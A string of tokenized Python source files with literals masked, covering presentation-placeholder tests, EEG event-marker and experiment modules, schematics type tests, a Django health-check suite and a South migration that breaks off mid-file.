fixture <EOL> def base_shape_ ( self , request ) : <EOL> return instance_mock ( request , BaseShape ) <EOL> @ pytest . fixture <EOL> def _LayoutPlaceholder_ ( self , request , layout_placeholder_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def ph_bldr ( self ) : <EOL> return ( <EOL> an_sp ( ) . with_child ( <EOL> an_nvSpPr ( ) . with_child ( <EOL> an_nvPr ( ) . with_child ( <EOL> a_ph ( ) . with_idx ( <NUM_LIT:1> ) ) ) ) <EOL> ) <EOL> @ pytest . fixture <EOL> def slide_layout_ ( self , request ) : <EOL> return instance_mock ( request , SlideLayout ) <EOL> class Describe_LayoutPlaceholders ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_placeholder_shape ( <EOL> self , factory_fixture ) : <EOL> layout_placeholders , ph_elm_ = factory_fixture [ : <NUM_LIT:2> ] <EOL> _LayoutShapeFactory_ , layout_placeholder_ = factory_fixture [ <NUM_LIT:2> : ] <EOL> layout_placeholder = layout_placeholders . _shape_factory ( ph_elm_ ) <EOL> _LayoutShapeFactory_ . assert_called_once_with ( <EOL> ph_elm_ , layout_placeholders <EOL> ) <EOL> assert layout_placeholder is layout_placeholder_ <EOL> def it_can_find_a_placeholder_by_idx_value ( self , get_fixture ) : <EOL> layout_placeholders , ph_idx , placeholder_ = get_fixture <EOL> placeholder = layout_placeholders . get ( idx = ph_idx ) <EOL> assert placeholder is placeholder_ <EOL> def it_returns_default_if_placeholder_having_idx_not_found ( <EOL> self , default_fixture ) : <EOL> layout_placeholders = default_fixture <EOL> default = '<STR_LIT>' <EOL> placeholder = layout_placeholders . get ( '<STR_LIT>' , default ) <EOL> assert placeholder is default <EOL> @ pytest . 
fixture <EOL> def default_fixture ( self , _iter_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> return layout_placeholders <EOL> @ pytest . fixture <EOL> def factory_fixture ( <EOL> self , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> return ( <EOL> layout_placeholders , ph_elm_ , _LayoutShapeFactory_ , <EOL> layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture ( params = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def get_fixture ( self , request , _iter_ , placeholder_ , placeholder_2_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> ph_idx = request . param <EOL> ph_shape_ = { <NUM_LIT:0> : placeholder_ , <NUM_LIT:1> : placeholder_2_ } [ request . param ] <EOL> return layout_placeholders , ph_idx , ph_shape_ <EOL> @ pytest . fixture <EOL> def _iter_ ( self , request , placeholder_ , placeholder_2_ ) : <EOL> return method_mock ( <EOL> request , _LayoutPlaceholders , '<STR_LIT>' , <EOL> return_value = iter ( [ placeholder_ , placeholder_2_ ] ) <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeFactory_ ( self , request , layout_placeholder_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def ph_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Shape ) <EOL> @ pytest . fixture <EOL> def placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder , idx = <NUM_LIT:0> ) <EOL> @ pytest . fixture <EOL> def placeholder_2_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder , idx = <NUM_LIT:1> ) </s>
<s> import time <EOL> import os <EOL> import socket <EOL> import sys <EOL> global marker_log <EOL> marker_log = None <EOL> global lsl_backend <EOL> lsl_backend = None <EOL> global river_backend <EOL> river_backend = None <EOL> def init_markers ( lsl , logfile , datariver ) : <EOL> """<STR_LIT>""" <EOL> if lsl : <EOL> try : <EOL> global lsl_backend <EOL> import pylsl . pylsl as pylsl <EOL> info = pylsl . stream_info ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:1> , <NUM_LIT:0> , pylsl . cf_string , "<STR_LIT>" + socket . gethostname ( ) + time . asctime ( ) ) <EOL> lsl_backend = pylsl . stream_outlet ( info ) <EOL> lsl_backend . pylsl = pylsl <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> if logfile : <EOL> try : <EOL> for k in xrange ( <NUM_LIT> ) : <EOL> fname = '<STR_LIT>' + str ( k ) + '<STR_LIT>' <EOL> if not os . path . exists ( fname ) : <EOL> global marker_log <EOL> marker_log = open ( fname , '<STR_LIT:w>' ) <EOL> break <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> if datariver : <EOL> try : <EOL> global river_backend <EOL> import framework . eventmarkers . datariver_backend <EOL> river_backend = framework . eventmarkers . datariver_backend <EOL> river_backend . send_marker ( int ( <NUM_LIT> ) ) <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> def send_marker ( markercode ) : <EOL> """<STR_LIT>""" <EOL> global lsl_backend <EOL> if lsl_backend is not None : <EOL> lsl_backend . push_sample ( lsl_backend . pylsl . vectorstr ( [ str ( markercode ) ] ) , lsl_backend . pylsl . local_clock ( ) , True ) <EOL> global marker_log <EOL> if marker_log is not None : <EOL> marker_log . write ( repr ( time . time ( ) ) + '<STR_LIT>' + str ( markercode ) + '<STR_LIT:\n>' ) <EOL> global river_backend <EOL> if river_backend is not None : <EOL> river_backend . send_marker ( int ( markercode ) ) </s>
<s> from framework . latentmodule import LatentModule <EOL> import random <EOL> class Main ( LatentModule ) : <EOL> def __init__ ( self ) : <EOL> LatentModule . __init__ ( self ) <EOL> self . trials1 = <NUM_LIT:5> <EOL> self . trials2 = <NUM_LIT:5> <EOL> self . a_probability = <NUM_LIT:0.5> <EOL> def run ( self ) : <EOL> self . marker ( <NUM_LIT:10> ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> for k in range ( self . trials1 ) : <EOL> self . crosshair ( <NUM_LIT:3> ) <EOL> if random . random ( ) < self . a_probability : <EOL> self . marker ( <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT:A>' , scale = <NUM_LIT:0.5> ) <EOL> else : <EOL> self . marker ( <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' , scale = <NUM_LIT:0.5> ) <EOL> self . sleep ( <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> for k in range ( self . trials2 ) : <EOL> self . crosshair ( <NUM_LIT:3> ) <EOL> if random . random ( ) < <NUM_LIT:0.5> : <EOL> self . marker ( <NUM_LIT:3> ) <EOL> self . picture ( '<STR_LIT>' , <NUM_LIT:2> , scale = <NUM_LIT> ) <EOL> else : <EOL> self . marker ( <NUM_LIT:4> ) <EOL> self . picture ( '<STR_LIT>' , <NUM_LIT:2> , scale = <NUM_LIT> ) <EOL> self . sleep ( random . uniform ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . sound ( '<STR_LIT>' , volume = <NUM_LIT:0.5> ) <EOL> self . write ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import logging <EOL> class MissingModule ( object ) : <EOL> __slots__ = [ "<STR_LIT>" ] <EOL> def __init__ ( self , name ) : <EOL> self . __name = name <EOL> def __getattr__ ( self , name ) : <EOL> if name . startswith ( "<STR_LIT>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % ( self . __name , ) ) <EOL> raise ImportError ( "<STR_LIT>" % ( self . __name , ) ) <EOL> def __bool__ ( self ) : <EOL> return False <EOL> __nonzero__ = __bool__ <EOL> def safe_import ( name ) : <EOL> try : <EOL> mod = __import__ ( name , None , None , "<STR_LIT:*>" ) <EOL> except ImportError : <EOL> mod = MissingModule ( name ) <EOL> except Exception : <EOL> if sys . platform == "<STR_LIT>" and name == "<STR_LIT>" : <EOL> mod = MissingModule ( name ) <EOL> else : <EOL> raise <EOL> return mod <EOL> def setup_logger ( options ) : <EOL> logging_options = { } <EOL> if options . quiet : <EOL> logging_options [ '<STR_LIT>' ] = logging . ERROR <EOL> else : <EOL> logging_options [ '<STR_LIT>' ] = logging . DEBUG <EOL> if options . logfile : <EOL> logging_options [ '<STR_LIT:file>' ] = options . logfile <EOL> logging . basicConfig ( ** logging_options ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , absolute_import <EOL> import bson <EOL> from . . common import * <EOL> from . . types import BaseType <EOL> from . . exceptions import ConversionError <EOL> class ObjectIdType ( BaseType ) : <EOL> """<STR_LIT>""" <EOL> MESSAGES = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , auto_fill = False , ** kwargs ) : <EOL> self . auto_fill = auto_fill <EOL> super ( ObjectIdType , self ) . __init__ ( ** kwargs ) <EOL> def to_native ( self , value , context = None ) : <EOL> if not isinstance ( value , bson . objectid . ObjectId ) : <EOL> try : <EOL> value = bson . objectid . ObjectId ( str ( value ) ) <EOL> except bson . objectid . InvalidId : <EOL> raise ConversionError ( self . messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> def to_primitive ( self , value , context = None ) : <EOL> return str ( value ) </s>
<s> import pytest <EOL> from schematics . datastructures import OrderedDict <EOL> from schematics . models import Model <EOL> from schematics . types import IntType , StringType <EOL> from schematics . types . compound import ModelType , ListType <EOL> from schematics . exceptions import ( <EOL> ConversionError , ValidationError , StopValidationError , DataError , <EOL> MockCreationError ) <EOL> def test_list_field ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( StringType , required = True ) <EOL> c = User ( { <EOL> "<STR_LIT>" : [ ] <EOL> } ) <EOL> c . validate ( { '<STR_LIT>' : [ ] } ) <EOL> assert c . ids == [ ] <EOL> def test_list_with_default_type ( ) : <EOL> class CategoryStatsInfo ( Model ) : <EOL> slug = StringType ( ) <EOL> class PlayerInfo ( Model ) : <EOL> categories = ListType ( ModelType ( CategoryStatsInfo ) ) <EOL> math_stats = CategoryStatsInfo ( dict ( slug = "<STR_LIT>" ) ) <EOL> twilight_stats = CategoryStatsInfo ( dict ( slug = "<STR_LIT>" ) ) <EOL> info = PlayerInfo ( { <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" } , { "<STR_LIT>" : "<STR_LIT>" } ] <EOL> } ) <EOL> assert info . categories == [ math_stats , twilight_stats ] <EOL> d = info . serialize ( ) <EOL> assert d == { <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" } , { "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> } <EOL> def test_set_default ( ) : <EOL> class CategoryStatsInfo ( Model ) : <EOL> slug = StringType ( ) <EOL> class PlayerInfo ( Model ) : <EOL> categories = ListType ( ModelType ( CategoryStatsInfo ) , <EOL> default = lambda : [ ] , <EOL> serialize_when_none = True ) <EOL> info = PlayerInfo ( ) <EOL> assert info . categories == [ ] <EOL> d = info . serialize ( ) <EOL> assert d == { <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> def test_list_defaults_to_none ( ) : <EOL> class PlayerInfo ( Model ) : <EOL> following = ListType ( StringType ) <EOL> info = PlayerInfo ( ) <EOL> assert info . following is None <EOL> assert info . 
serialize ( ) == { <EOL> "<STR_LIT>" : None , <EOL> } <EOL> def test_list_default_to_none_embedded_model ( ) : <EOL> class QuestionResource ( Model ) : <EOL> url = StringType ( ) <EOL> class QuestionResources ( Model ) : <EOL> pictures = ListType ( ModelType ( QuestionResource ) ) <EOL> class Question ( Model ) : <EOL> id = StringType ( ) <EOL> resources = ModelType ( QuestionResources ) <EOL> class QuestionPack ( Model ) : <EOL> id = StringType ( ) <EOL> questions = ListType ( ModelType ( Question ) ) <EOL> question_pack = QuestionPack ( { <EOL> "<STR_LIT:id>" : "<STR_LIT:1>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:1>" , <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> } ] <EOL> } <EOL> } , <EOL> ] <EOL> } ) <EOL> assert question_pack . questions [ <NUM_LIT:0> ] . resources is None <EOL> assert question_pack . questions [ <NUM_LIT:1> ] . resources [ "<STR_LIT>" ] == [ ] <EOL> resource = QuestionResource ( { "<STR_LIT:url>" : "<STR_LIT>" } ) <EOL> assert question_pack . questions [ <NUM_LIT:2> ] . resources [ "<STR_LIT>" ] [ <NUM_LIT:0> ] == resource <EOL> def test_validation_with_size_limits ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( ) <EOL> class Card ( Model ) : <EOL> users = ListType ( ModelType ( User ) , min_size = <NUM_LIT:1> , max_size = <NUM_LIT:2> , required = True ) <EOL> with pytest . raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : None } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> with pytest . raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : [ ] } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> with pytest . 
raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : [ User ( ) , User ( ) , User ( ) ] } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> def test_list_field_required ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( StringType ( required = True ) ) <EOL> c = User ( { <EOL> "<STR_LIT>" : [ ] <EOL> } ) <EOL> c . ids = [ ] <EOL> c . validate ( ) <EOL> c . ids = [ <NUM_LIT:1> ] <EOL> c . validate ( ) <EOL> c . ids = [ None ] <EOL> with pytest . raises ( DataError ) : <EOL> c . validate ( ) <EOL> def test_list_field_convert ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( IntType ) <EOL> c = User ( { '<STR_LIT>' : [ "<STR_LIT:1>" , "<STR_LIT:2>" ] } ) <EOL> assert c . ids == [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def test_list_coercion ( ) : <EOL> field = ListType ( StringType ) <EOL> assert field ( ( '<STR_LIT>' , ) ) == [ '<STR_LIT>' ] <EOL> assert field ( set ( ( '<STR_LIT>' , ) ) ) == [ '<STR_LIT>' ] <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( { <NUM_LIT:1> : '<STR_LIT:bar>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:0> : '<STR_LIT:foo>' } ) <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( '<STR_LIT>' ) <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( None ) <EOL> def test_list_model_field ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( ) <EOL> class Card ( Model ) : <EOL> users = ListType ( ModelType ( User ) , min_size = <NUM_LIT:1> , required = True ) <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT:name>' : u'<STR_LIT>' } ] } <EOL> c = Card ( data ) <EOL> c . users = None <EOL> with pytest . raises ( DataError ) as exception : <EOL> c . validate ( ) <EOL> errors = exception . value . 
messages <EOL> assert errors [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> def test_list_model_field_exception_with_full_message ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( max_length = <NUM_LIT:1> ) <EOL> class Group ( Model ) : <EOL> users = ListType ( ModelType ( User ) ) <EOL> g = Group ( { '<STR_LIT>' : [ { '<STR_LIT:name>' : "<STR_LIT>" } ] } ) <EOL> with pytest . raises ( DataError ) as exception : <EOL> g . validate ( ) <EOL> assert exception . value . messages == { '<STR_LIT>' : { <NUM_LIT:0> : { '<STR_LIT:name>' : [ '<STR_LIT>' ] } } } <EOL> def test_compound_fields ( ) : <EOL> comments = ListType ( ListType , compound_field = StringType ) <EOL> assert isinstance ( comments . field , ListType ) <EOL> def test_mock_object ( ) : <EOL> assert ListType ( IntType , required = True ) . mock ( ) is not None <EOL> with pytest . raises ( MockCreationError ) as exception : <EOL> ListType ( IntType , min_size = <NUM_LIT:10> , max_size = <NUM_LIT:1> , required = True ) . mock ( ) <EOL> def test_mock_object_with_model_type ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( required = True ) <EOL> age = IntType ( required = True ) <EOL> assert isinstance ( ListType ( ModelType ( User ) , required = True ) . mock ( ) [ - <NUM_LIT:1> ] , User ) </s>
<s> __author__ = '<STR_LIT>' <EOL> __all__ = [ '<STR_LIT>' ] <EOL> import capnp <EOL> from pathlib import Path <EOL> import tempfile <EOL> temp_dir = Path ( tempfile . mkdtemp ( ) ) <EOL> capnp_schema_path = Path ( "<STR_LIT>" ) <EOL> if not capnp_schema_path . exists ( ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> lines = capnp_schema_path . open ( ) . readlines ( ) <EOL> skip_lines = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> lines = ( line for line in lines if line not in skip_lines ) <EOL> capnp_schema_path = temp_dir / capnp_schema_path . name <EOL> capnp_schema_path . open ( '<STR_LIT:w>' ) . writelines ( lines ) <EOL> assert capnp_schema_path . exists ( ) <EOL> capnp . remove_import_hook ( ) <EOL> schema = capnp . load ( str ( capnp_schema_path ) ) </s>
<s> from django . test import TestCase <EOL> import mocker <EOL> import health <EOL> class CheckItem ( TestCase ) : <EOL> def test_call_must_be_implemented ( self ) : <EOL> class CheckIt ( health . CheckItem ) : <EOL> pass <EOL> check = CheckIt ( ) <EOL> self . assertRaises ( NotImplementedError , check ) <EOL> class CheckListTests ( mocker . MockerTestCase ) : <EOL> def test_refresh_in_minutes ( self ) : <EOL> import datetime <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertEqual ( datetime . timedelta ( minutes = <NUM_LIT:2> ) , <EOL> check_list . _refresh_rate ) <EOL> def test_latest_refresh_date_starts_as_None ( self ) : <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertIsNone ( check_list . _refreshed_at ) <EOL> def test_add_check ( self ) : <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( check_list . _check_list ) , <NUM_LIT:0> ) <EOL> class CheckIt ( health . CheckItem ) : <EOL> def __call__ ( self ) : <EOL> return True <EOL> check_list . add_check ( CheckIt ( ) ) <EOL> self . assertEqual ( len ( check_list . _check_list ) , <NUM_LIT:1> ) <EOL> def test_run ( self ) : <EOL> class CheckIt ( health . CheckItem ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> return True <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> check = CheckIt ( ) <EOL> check_list . add_check ( check ) <EOL> check_list . run ( ) <EOL> self . assertEqual ( check_list . latest_report , <EOL> { '<STR_LIT>' : { '<STR_LIT:status>' : True , '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_since ( self ) : <EOL> """<STR_LIT>""" <EOL> import datetime <EOL> dt1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> dt2 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:10> ) <EOL> check_list = health . 
CheckList ( refresh = <NUM_LIT:1> ) <EOL> check_list . _refreshed_at = dt1 <EOL> mock_datetime = self . mocker . replace ( datetime ) <EOL> mock_datetime . datetime . now ( ) <EOL> self . mocker . result ( dt2 ) <EOL> self . mocker . replay ( ) <EOL> self . assertEqual ( check_list . since ( ) , '<STR_LIT>' ) </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Journal . objects . filter ( medline_title = None ) . update ( medline_title = '<STR_LIT>' ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Journal . objects . filter ( medline_title = '<STR_LIT>' ) . update ( medline_title = None ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' 
, [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , 
